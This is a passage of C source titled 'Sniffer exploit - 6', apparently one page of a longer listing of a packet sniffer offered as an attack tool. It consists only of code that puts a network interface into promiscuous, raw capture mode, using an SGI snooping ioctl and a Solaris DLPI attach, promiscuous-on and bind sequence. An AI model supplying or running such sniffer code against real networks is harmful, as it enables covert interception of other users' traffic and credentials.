Sniffer exploit - 6


if(ioctl(sock,SIOCSNOOPING,&on)<0) return(-4);

#endif

 

#ifdef SOLARIS

long buf[CHUNKSIZE]; dl_attach_req_t ar; dl_promiscon_req_t pr;

struct strioctl si; union DL_primitives *dp; dl_bind_req_t bind_req;

struct strbuf c; int flags;

if ((sock=open(nit_dev,2))<0) return(-1);

ar.dl_primitive=DL_ATTACH_REQ; ar.dl_ppa=0; c.maxlen=0;

c.len=sizeof(dl_attach_req_t); c.buf=(char *)&ar;

if (putmsg(sock,&c,NULL,0)<0) return(-2);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlokack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_OK_ACK) return(-3);

pr.dl_primitive=DL_PROMISCON_REQ; pr.dl_level=DL_PROMISC_PHYS; c.maxlen = 0;

c.len=sizeof(dl_promiscon_req_t); c.buf=(char *)&pr;

if (putmsg(sock,&c,NULL,0)<0) return(-4);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlokack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_OK_ACK) return(-5);

bind_req.dl_primitive=DL_BIND_REQ; bind_req.dl_sap=0x800;

bind_req.dl_max_conind=0; bind_req.dl_service_mode=DL_CLDLS;

bind_req.dl_conn_mgmt=0; bind_req.dl_xidtest_flg=0; c.maxlen=0;

c.len=sizeof(dl_bind_req_t); c.buf=(char *)&bind_req;

if (putmsg(sock,&c,NULL,0)<0) return(-6);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlbindack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_BIND_ACK) return(-7);

si.ic_cmd=DLIOCRAW; si.ic_timout=-1; si.ic_len=0; si.ic_dp=NULL;

if (ioctl(sock, I_STR, &si)<0) return(-8);

if (ioctl(sock,I_FLUSH,FLUSHR)<0) return(-9);

#endif

return(sock);

}




- -  - -  - -